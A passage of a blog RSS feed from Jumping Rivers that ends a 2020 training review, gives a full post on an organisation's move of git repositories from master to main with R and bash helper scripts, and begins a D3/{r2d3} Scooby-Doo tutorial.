other week! We also have Rhian on 26 and Jamie on 20 courses
respectively!&lt;/p&gt;
&lt;h2 id="most-attendees"&gt;Most Attendees&lt;/h2&gt;
&lt;img src="https://www.jumpingrivers.com/blog/2020-training-review/Trainer_att7.svg" style="display: block; margin: auto;"&gt;
&lt;p&gt;Unsurprisingly, Theo also wins the award for the most attendees taught
in 2020 having taught 437 people in total!&lt;/p&gt;
&lt;h1 id="final-thoughts"&gt;Final Thoughts&lt;/h1&gt;
&lt;p&gt;What a unique year 2020 was. I have to say, the team of trainers at
Jumping Rivers handled the transition from on-site to online courses
very smoothly! In fact, even with the one-month transitionary period,
the course numbers were similar to 2019! In August 2021, at the point of
writing, we are running online courses only. However, our plan is
currently to run both online and on-site courses from the turn of the
new year, so stay tuned! You can check our currently available public
courses &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/2020-training-review/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Git: Moving from Master to Main</title><link>https://www.jumpingrivers.com/blog/git-moving-master-to-main/</link><pubDate>Tue, 19 Oct 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/git-moving-master-to-main/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/git-moving-master-to-main/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/git-moving-master-to-main/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;In June 2020,
&lt;a href="https://stevenmortimer.com/5-steps-to-change-github-default-branch-from-master-to-main/" rel="external"&gt;GitHub&lt;/a&gt;
announced that it was moving the default branch name from &lt;code&gt;master&lt;/code&gt; to
the more neutral name, &lt;code&gt;main&lt;/code&gt;.
&lt;a href="https://about.gitlab.com/blog/2021/03/10/new-git-default-branch-name/" rel="external"&gt;GitLab&lt;/a&gt;
followed suit a few months later. &lt;a href="https://twitter.com/tobie/status/1270290278029631489" rel="external"&gt;Tobie
Langel&lt;/a&gt; makes the
salient point on why changing the name is a good thing:&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/git-moving-master-to-main/master-to-main-tweet.png" title="Tweet describing master and main" alt="Tweet describing master and main" width="400px" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;So &lt;code&gt;master&lt;/code&gt; is not only racist, it’s also a silly name in the first
place.&lt;/p&gt;
&lt;p&gt;The purpose of this post is to summarise some of the challenges we faced
when moving from &lt;code&gt;master&lt;/code&gt; to &lt;code&gt;main&lt;/code&gt;, with the goal that if you decide to
make the same change, you’ll hopefully avoid some of the issues.&lt;/p&gt;
&lt;h2 id="renaming-a-single-repository"&gt;Renaming a Single Repository&lt;/h2&gt;
&lt;p&gt;Renaming a single repository is relatively straightforward. There are
five main steps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Copy the master branch and history to &lt;code&gt;main&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Push &lt;code&gt;main&lt;/code&gt; to the remote repository, i.e. GitHub / GitLab&lt;/li&gt;
&lt;li&gt;Point HEAD to the &lt;code&gt;main&lt;/code&gt; branch&lt;/li&gt;
&lt;li&gt;Change the default branch to &lt;code&gt;main&lt;/code&gt; on the remote&lt;/li&gt;
&lt;li&gt;Delete the &lt;code&gt;master&lt;/code&gt; branch on the remote repo&lt;/li&gt;
&lt;/ol&gt;
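&lt;p&gt;Since we work mostly in R, here is a hedged sketch of those steps driven from R with &lt;code&gt;system2()&lt;/code&gt;. The helper names &lt;code&gt;git()&lt;/code&gt; and &lt;code&gt;rename_master_to_main()&lt;/code&gt; are hypothetical, the remote is assumed to be called &lt;code&gt;origin&lt;/code&gt;, and the git commands are the standard ones for each step rather than a record of what we actually ran:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;
# Hypothetical helper: run one git command inside `repo`, stopping on failure
git = function(repo, ...) {
  args = c(...)
  status = system2("git", c("-C", shQuote(repo), args))
  if (status != 0) {
    stop("git ", paste(args, collapse = " "), " failed")
  }
  invisible(status)
}

# Hypothetical helper covering the steps above; assumes a remote called origin
rename_master_to_main = function(repo, delete_master = FALSE) {
  # 1. Copy master and its history to main (a local rename)
  git(repo, "branch", "-m", "master", "main")
  # 2. Push main to the remote and track it
  git(repo, "push", "-u", "origin", "main")
  # 3. Point the local record of the remote HEAD at main
  git(repo, "symbolic-ref", "refs/remotes/origin/HEAD", "refs/remotes/origin/main")
  # 4. Changing the default branch happens in the GitHub / GitLab settings,
  #    so there is no git command for it here
  # 5. Only delete master on the remote once step 4 has been done
  if (delete_master) {
    git(repo, "push", "origin", "--delete", "master")
  }
  invisible(repo)
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Keeping the deletion behind &lt;code&gt;delete_master = TRUE&lt;/code&gt; means the function can be run first, the default branch changed on the remote, and &lt;code&gt;master&lt;/code&gt; removed afterwards.&lt;/p&gt;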
&lt;p&gt;There are several nice descriptions on how to change a single
repository. For example, &lt;a href="https://stevenmortimer.com/5-steps-to-change-github-default-branch-from-master-to-main/" rel="external"&gt;Steven
Mortimer&lt;/a&gt;
has a nice blog post that leads you through the process.&lt;/p&gt;
&lt;p&gt;While I’ve read of individuals making the move, I’ve not read about
organisations making the change. I’m sure there are numerous companies
that have made the move, I’ve just not seen them.&lt;/p&gt;
&lt;h2 id="the-jumping-rivers-move"&gt;The Jumping Rivers Move&lt;/h2&gt;
&lt;p&gt;During August 2021, we started renaming our repositories from &lt;code&gt;master&lt;/code&gt;
to &lt;code&gt;main&lt;/code&gt;. We deliberately chose August, because that month is the main
school holiday in the UK. That means most of our clients and team are on
holiday, so the impact of any change was reduced.&lt;/p&gt;
&lt;h2 id="an-overview-of-jumping-rivers-repositories"&gt;An Overview of Jumping Rivers Repositories&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Protected default branches:&lt;/strong&gt; At &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping
Rivers&lt;/a&gt; our default branch (&lt;code&gt;master&lt;/code&gt; /
&lt;code&gt;main&lt;/code&gt;) is protected. This means that we can’t push directly to the
default branch. Instead, we need to create a branch and merge.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Code owners:&lt;/strong&gt; all repositories have a named list of repository
owners. Depending on the repository, this is usually between two and six
people. These are the members of the Jumping Rivers team who have
permission to merge a branch onto the default branch (&lt;code&gt;master&lt;/code&gt; /
&lt;code&gt;main&lt;/code&gt;). The person who made the initial merge request &lt;strong&gt;cannot&lt;/strong&gt; merge
into main. This has to be an additional team member.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Continuous integration:&lt;/strong&gt; all repositories have a CI process. The CI
ranges from very elaborate pipelines to (relatively) simple checks on
the contents of committed files. In order to merge into the default
branch the CI must pass. To avoid copying CI scripts to our
repositories, all CI files are templated. A typical CI file looks
something like:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yml" data-lang="yml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;include&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# https://repo-url.com/ci-templates/-/blob/master/templates/r-package.yml&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#7ee787"&gt;project&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;jumpingrivers/tools/ci-templates&amp;#39;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;ref&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;master&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;file&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;/templates/r-package.yml&amp;#39;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that the word “master” appears twice in this code chunk.&lt;/p&gt;
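&lt;p&gt;One way to update both occurrences is a pair of targeted substitutions. The sketch below works on the lines of the example file above; reading and writing the real CI file is left out, and this is an illustration rather than the script we used:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;
# The example CI file from above, one element per line
ci = c(
  "include:",
  "  # https://repo-url.com/ci-templates/-/blob/master/templates/r-package.yml",
  "  - project: 'jumpingrivers/tools/ci-templates'",
  "    ref: master",
  "    file: '/templates/r-package.yml'"
)

# Replace only the two known patterns, so that any other use of the
# word "master" in a CI file would be left untouched
ci_new = sub("/blob/master/", "/blob/main/", ci, fixed = TRUE)
ci_new = sub("ref: master", "ref: main", ci_new, fixed = TRUE)

# Print the updated file
writeLines(ci_new)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Matching the exact patterns, rather than every instance of the word, is a deliberately cautious choice.&lt;/p&gt;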
&lt;p&gt;&lt;strong&gt;RStudio Package Manager (RSPM):&lt;/strong&gt; We use RSPM to manage our R
packages. Currently, any package that is tagged on our GitLab server is
added to our RSPM. We also have neat scripts that &lt;em&gt;automatically&lt;/em&gt; scan
for new repositories and add them to RSPM without any user interaction.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2021-git-moving-master-to-main"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;&lt;strong&gt;RStudio Connect (RSC) &amp;amp; Shiny Servers:&lt;/strong&gt; We deploy multiple Shiny
applications and markdown documents to RStudio Connect. Likewise, we
have similar pipelines with Shiny Server, Shiny Proxy, etc.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Web page:&lt;/strong&gt; This &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;website&lt;/a&gt; is hosted on
GitLab and deployed via Netlify.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Historical repositories:&lt;/strong&gt; As with many organisations, our standards
have evolved over time. We’ve found that, when working as a distributed
team, a consistent repository structure helps us work together. The CI
now enforces, amongst other things:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;a README.md file&lt;/li&gt;
&lt;li&gt;a project description file&lt;/li&gt;
&lt;li&gt;a CODEOWNERS file with at least two names&lt;/li&gt;
&lt;li&gt;a “minimum” .gitignore file&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;When we go back to an old project, say from 12 months ago, we often have to
spend about ten minutes tightening up the repository. For a single project,
this is fine. But across a large number of simultaneous projects, this becomes
time consuming.&lt;/p&gt;
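&lt;p&gt;As an illustration only, the kind of structure check listed above could be sketched in bash roughly as follows. This is not our actual CI job: the function name &lt;code&gt;check_repo_structure&lt;/code&gt; is hypothetical, it assumes CODEOWNERS sits at the repository root, it counts owners as distinct &lt;code&gt;@handle&lt;/code&gt; entries (so an email address would also be counted), and it leaves out the project description file because its name is not given here.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;# Hypothetical sketch: report missing files and return non-zero on failure.
check_repo_structure() {
  local repo_dir="$1"   # path to the repository to inspect
  local status=0
  local f

  # Files that must exist at the top level of the repository
  for f in README.md CODEOWNERS .gitignore; do
    if [ ! -f "$repo_dir/$f" ]; then
      echo "missing: $f"
      status=1
    fi
  done

  # CODEOWNERS should name at least two distinct owners (assumed: @handles)
  if [ -f "$repo_dir/CODEOWNERS" ]; then
    local owners
    owners=$(grep -o '@[A-Za-z0-9_./-]*' "$repo_dir/CODEOWNERS" | sort -u | wc -l | tr -d ' ')
    if [ "$owners" -lt 2 ]; then
      echo "CODEOWNERS lists $owners owner(s), expected at least 2"
      status=1
    fi
  fi

  return "$status"
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Calling &lt;code&gt;check_repo_structure .&lt;/code&gt; from the root of a repository prints one line per problem, so a CI job could fail on a non-zero return value.&lt;/p&gt;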
&lt;p&gt;&lt;strong&gt;Summary:&lt;/strong&gt; The above points when taken together mean:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Every repo will need to be changed from &lt;code&gt;master&lt;/code&gt; to &lt;code&gt;main&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;As every repo has a CI process that depends on a &lt;code&gt;master&lt;/code&gt; branch,
every repo will need a minor update to the CI file.&lt;/li&gt;
&lt;li&gt;As every repo has a CODEOWNERS file, this means another team member
will be required to approve and merge any merge request.&lt;/li&gt;
&lt;li&gt;Changing a repository from &lt;code&gt;master&lt;/code&gt; to &lt;code&gt;main&lt;/code&gt; will also require a
manual change in RSC or RSPM to point to a different branch.&lt;/li&gt;
&lt;li&gt;Changing old projects will incur the wrath of the CI, as other
tidying jobs will be required.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="potential-stragies-for-moving"&gt;Potential Strategies for Moving&lt;/h2&gt;
&lt;h3 id="the-hybrid-approach"&gt;The Hybrid Approach&lt;/h3&gt;
&lt;p&gt;Our initial plan was to take a hybrid approach: alter the template CI
process to handle either &lt;code&gt;master&lt;/code&gt; or &lt;code&gt;main&lt;/code&gt;. Then gradually move
repositories across. We decided against this as&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;this was going to be a substantial piece of work in itself, which
would ultimately be binned.&lt;/li&gt;
&lt;li&gt;we have a number of Shiny apps that generate overviews of
repositories; this would also need to go into hybrid mode.&lt;/li&gt;
&lt;li&gt;maintaining both a &lt;code&gt;master&lt;/code&gt; &amp;amp; &lt;code&gt;main&lt;/code&gt; version would increase work &amp;amp;
maintenance&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For larger organisations / companies this would be the correct strategy.
I would estimate if we were double our current size, then we would have
taken this route.&lt;/p&gt;
&lt;h3 id="moving-sections"&gt;Moving sections&lt;/h3&gt;
&lt;p&gt;For historical reasons, our training materials and associated
infrastructure live in a semi-independent repository project. As such,
when we did a large update to our course notes around Christmas
2020, the training materials moved to &lt;code&gt;main&lt;/code&gt;. Part of this overhaul was
also implementing CODEOWNERS and template CI processes.&lt;/p&gt;
&lt;p&gt;However the non-training repositories are all coupled via the CI
process, so it wasn’t possible to easily move other sections.&lt;/p&gt;
&lt;h3 id="semi-hybrid-approach"&gt;Semi-hybrid Approach&lt;/h3&gt;
&lt;p&gt;We changed the CI template repository from &lt;code&gt;master&lt;/code&gt; to &lt;code&gt;main&lt;/code&gt;. As this
is templated across every repository, this means that any changes to a
repository would now fail the CI, unless the CI template file was
updated. This provided a natural method for incorporating changes into
repositories that were being actively used. We also identified key
repositories, where we had to take extra care, for example our Website.&lt;/p&gt;
&lt;p&gt;Next, we encouraged people to rename the protected branches from
&lt;code&gt;master&lt;/code&gt; to &lt;code&gt;main&lt;/code&gt;. To be honest, I’m not sure how many people listened
to this encouragement. There’s always something more pressing to do!&lt;/p&gt;
&lt;p&gt;About four weeks after the process started, our CI now enforces that the
default branch in a repository must be called &lt;code&gt;main&lt;/code&gt;. Furthermore, if a
&lt;code&gt;master&lt;/code&gt; branch exists, it must be deleted. This approach worked for us,
as we didn’t have (much) critical infrastructure. If a CI job broke for
10 minutes, then no harm was done.&lt;/p&gt;
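&lt;p&gt;A minimal sketch of such an enforcement step is shown below, assuming it runs inside a clone of the repository. The function name &lt;code&gt;check_default_branch&lt;/code&gt; is hypothetical and this is not our real template; in GitLab CI the first argument could be the predefined &lt;code&gt;CI_DEFAULT_BRANCH&lt;/code&gt; variable.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;# Hypothetical sketch: fail unless the default branch is main and
# no master branch is left on the remote.
check_default_branch() {
  local default_branch="$1"      # e.g. "$CI_DEFAULT_BRANCH" in GitLab CI
  local remote="${2:-origin}"    # remote to inspect, origin if not given
  local status=0

  if [ "$default_branch" != "main" ]; then
    echo "default branch is '$default_branch', expected 'main'"
    status=1
  fi

  # ls-remote prints a line only if refs/heads/master exists on the remote
  local stale
  stale=$(git ls-remote "$remote" refs/heads/master)
  if [ -n "$stale" ]; then
    echo "a master branch still exists on $remote and should be deleted"
    status=1
  fi

  return "$status"
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Collecting both problems before returning means a single CI run reports everything that needs fixing, rather than stopping at the first failure.&lt;/p&gt;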
&lt;p&gt;Our final stage will take place in a couple of months, when we’ll
systematically work through groups of repos and make the change, for
example, all R packages or all Shiny applications.&lt;/p&gt;
&lt;h2 id="hindsight-is-a-wonderful-thing"&gt;Hindsight is a Wonderful Thing&lt;/h2&gt;
&lt;p&gt;Overall the process wasn’t/isn’t too painful. But with hindsight, we did
make things more difficult than they needed to be. To help anyone else
looking to make this move, here’s a list of things I wish we had
implemented from day 1:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;A clear guide for changing from &lt;code&gt;master&lt;/code&gt; to &lt;code&gt;main&lt;/code&gt;. This should be
for your organisation, don’t just point to someone else’s blog post.
Ensure you can copy the code and also make the guide easy to find -
don’t just stick it in an email.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;If anyone queries that guide, update the guide. Avoid the temptation
to store the answer in Slack. Maintain and refer to that single
point of truth.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Remember to include a step for updating a local repo that has been
changed by someone else.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Have a Slack channel for the move and use it. We had the channel, but
never really used it.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;When you delete and then create a protected branch, you should be
clear about the standards within your organisation. We used the
GitLab API to set the various options, e.g. the merge method, whether code
owner approval is required, and whether a user can force push. However, we had
never decided what these default options should be, so this had to
be documented (a good thing)!&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Initially when updating RSPM / RSC we made a Slack request. This is
a bad idea as it’s easy to get lost in the noise of Slack. Instead,
create a merge request and assign it to the correct person. That way
it’s clear what has to be done.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Most (all?) blog posts concentrate on the view of a single
individual. When working in a team if someone updates the default
branch, this obviously impacts everyone else. Once you know this is
going to happen, then you simply run a few standard commands:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;git fetch --all &lt;span style="color:#8b949e;font-style:italic"&gt;# update all remotes&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;git checkout main &lt;span style="color:#8b949e;font-style:italic"&gt;# checkout the new main&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# update local HEAD&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;git symbolic-ref refs/remotes/origin/HEAD refs/remotes/origin/main
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;git branch -d master &lt;span style="color:#8b949e;font-style:italic"&gt;# delete local master&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;git branch -rd origin/master &lt;span style="color:#8b949e;font-style:italic"&gt;# delete remote master ref&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Our quietest month is followed by our busiest month! This can make
things stressful.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;“We also identified key repositories that had to be updated”. I wish
we had spent more time thinking about this.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
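&lt;p&gt;The commands in the list above cover a teammate catching up after the rename. For the person making the change, the corresponding steps might look roughly like the sketch below. The function names are hypothetical, the remote is assumed to be called &lt;code&gt;origin&lt;/code&gt;, and the middle step (switching the default and protected branch) happens on the GitLab side, so it is only a comment here.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;# Step 1: rename the local branch and publish it under the new name.
rename_local_branch() {
  git branch -m master main    # rename local master to main
  git push -u origin main      # push main and track origin/main
}

# Step 2 (done in GitLab, not here): make main the default branch and
# apply your organisation's protected branch settings to it.

# Step 3: once nothing points at master any more, delete it on the remote.
delete_remote_master() {
  git push origin --delete master
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Step 3 is expected to be rejected while &lt;code&gt;master&lt;/code&gt; is still the default or a protected branch, which is a useful safeguard against running the steps out of order.&lt;/p&gt;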
&lt;p&gt;There are also the “unknown unknowns”. Things we just didn’t expect. For
example, we have an internal R package for accessing the GitLab API. The
default branch is &lt;code&gt;master&lt;/code&gt;. Should we change the default or leave it
alone? We went for changing.&lt;/p&gt;
&lt;p&gt;Another annoying issue was when an older repository had issues,
i.e. something wasn’t working. Was this due to the &lt;code&gt;master&lt;/code&gt;/&lt;code&gt;main&lt;/code&gt; change or
was it something else?&lt;/p&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;In our experience, changing from &lt;code&gt;master&lt;/code&gt; to &lt;code&gt;main&lt;/code&gt; generated around
thirty days of additional work. If we had followed our “hindsight”
section, this could have been reduced by around fifteen days. Making the change
is worthwhile and the correct thing to do. But &lt;strong&gt;it will&lt;/strong&gt; break lots of
things. As everything has a CI process and requires a code review at
Jumping Rivers, this meant we never actually broke anything (sort of),
but it did add an unexpected (one-off) barrier to committing to a
project. Another point to note is that the Jumping Rivers team is very
technical. Everyone is familiar with Linux, tweaking CI files, and using
the command line. This is not true of all teams.&lt;/p&gt;
&lt;p&gt;If you are considering moving, then I’m more than happy to chat through
our pain points with you. Just drop me an email at
&lt;a href="mailto:colin@jumpingrivers.com" rel="external"&gt;colin@jumpingrivers.com&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/git-moving-master-to-main/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Your first D3 visualisation with {r2d3} and Scooby-Doo</title><link>https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/</link><pubDate>Tue, 12 Oct 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;script src="https://d3js.org/d3.v5.js"&gt;&lt;/script&gt;
&lt;script src="https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/scooby_scripts/data.js"&gt;&lt;/script&gt;
&lt;script src="https://code.jquery.com/jquery-3.6.0.min.js"
integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4="
crossorigin="anonymous"&gt;&lt;/script&gt;
&lt;hr&gt;
&lt;p&gt;&lt;a href="https://github.com/jumpingrivers/blog"
style="font-size:25px"&gt;
&lt;img class="image-left"
src="https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/gh_logo.png"
style="width:32px; class:image-left"/&gt;
  Get the code for this blog on GitHub&lt;/a&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="what-is-this-tutorial-and-who-is-it-for"&gt;What is this tutorial and who is it for?&lt;/h2&gt;
&lt;p&gt;This tutorial is aimed mainly at R users who want to learn a bit of D3,
and specifically those who are interested in how you can incorporate D3
into your existing workflows in RStudio. It will gloss over a lot of the
fundamentals of D3 and related topics (JavaScript, CSS, and HTML) to
fast-forward the process of creating your first D3.js visualisation. It
will therefore be far from a comprehensive guide. I’ve tried to include
what I think is important, but if you have absolutely no experience with
any of those topics you will almost definitely be left with some
questions. Hopefully, the satisfaction of creating your first plot will
inspire you to break and tweak the code I have provided to learn more.&lt;/p&gt;
&lt;h2 id="what-is-d3"&gt;What is D3?&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://d3js.org/" rel="external"&gt;D3.js&lt;/a&gt;, or just D3 as it’s more often referred to,
is a JavaScript library used for creating interactive data
visualisations optimised for the web. D3 stands for Data-Driven
Documents. It is commonly used by those who enjoy making creative or
otherwise unusual visualisations as it offers you a great deal of
freedom as well as options for interactivity such as animated
transitions and plot zooming.&lt;/p&gt;
&lt;h2 id="why-should-i-care"&gt;Why should I care?&lt;/h2&gt;
&lt;p&gt;One benefit of D3 is its aforementioned creative control. Another
benefit is that rather than creating raster images (e.g. PNG, JPEG) like
a lot of plotting libraries it renders your figures as SVGs (scalable
vector graphics), which stay crisp no matter how far you zoom in and are
generally faster to load (note: when there are many data points, an SVG
may be slower than a raster image, learn more about which image file
type to use in &lt;a href="https://www.jumpingrivers.com/blog/knitr-image-png-jpeg-svg-rmarkdown/" rel="external"&gt;our blog post on image
formats&lt;/a&gt;).
If you are an R user, you should also care because the {r2d3} package
lets you easily incorporate D3 visualisations into your R workflow, and
use them in e.g. R Markdown reports or R Shiny dashboards.&lt;/p&gt;
&lt;h2 id="is-learning-d3-worth-the-effort"&gt;Is learning D3 worth the effort?&lt;/h2&gt;
&lt;p&gt;The short answer is: it depends. It can be quite tricky and
time-consuming to learn D3 and all associated skills (JavaScript, HTML,
CSS) if you have no previous experience. On the other hand, learning D3
can be a fun way to take your first steps into web development
technologies. Furthermore, you may be perfectly happy with available
plotting libraries in R, e.g. {ggplot2}, as what they offer is indeed
highly flexible and suitable for interactivity. You can even save ggplot
plots as SVG with &lt;code&gt;ggsave()&lt;/code&gt; and &lt;code&gt;svglite&lt;/code&gt;. Therefore, I don’t think
learning D3 is a necessity for data visualisation, but it can be an
addition to your skill set and can be a great first step into creative
coding or web development.&lt;/p&gt;
&lt;h2 id="what-is-r2d3"&gt;What is {r2d3}?&lt;/h2&gt;
&lt;p&gt;If you are still with me, let’s get into {r2d3}.
&lt;a href="https://rstudio.github.io/r2d3/" rel="external"&gt;{r2d3}&lt;/a&gt; is an R package that lets you
create D3 visualisations with R. One way it enhances this process is by
being able to translate between R objects and D3-friendly data
structures. This means that you can clean your data in R, and then just
plot it using D3 without having to go near any data wrangling using
JavaScript. Another cool feature is that you can create D3-rendering
chunks in an R Markdown file that will preview inline, so you can easily
incorporate a D3 visualisation in your reports. You can also easily add
a D3 visualisation to a Shiny app using the &lt;code&gt;renderD3()&lt;/code&gt; and
&lt;code&gt;d3Output()&lt;/code&gt; functions. If you need help with a Shiny Application, we
can
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=d3-intro" rel="external"&gt;help&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="the-basics"&gt;The basics&lt;/h2&gt;
&lt;p&gt;OK, let’s get set up to create our first D3 visualisation in RStudio.
We’re gonna be using
&lt;a href="https://www.kaggle.com/williamschooleman/scoobydoo-complete" rel="external"&gt;this&lt;/a&gt; fun
dataset on Scooby-Doo manually aggregated by user
&lt;a href="https://www.kaggle.com/williamschooleman/" rel="external"&gt;plummeye&lt;/a&gt;. We are gonna make
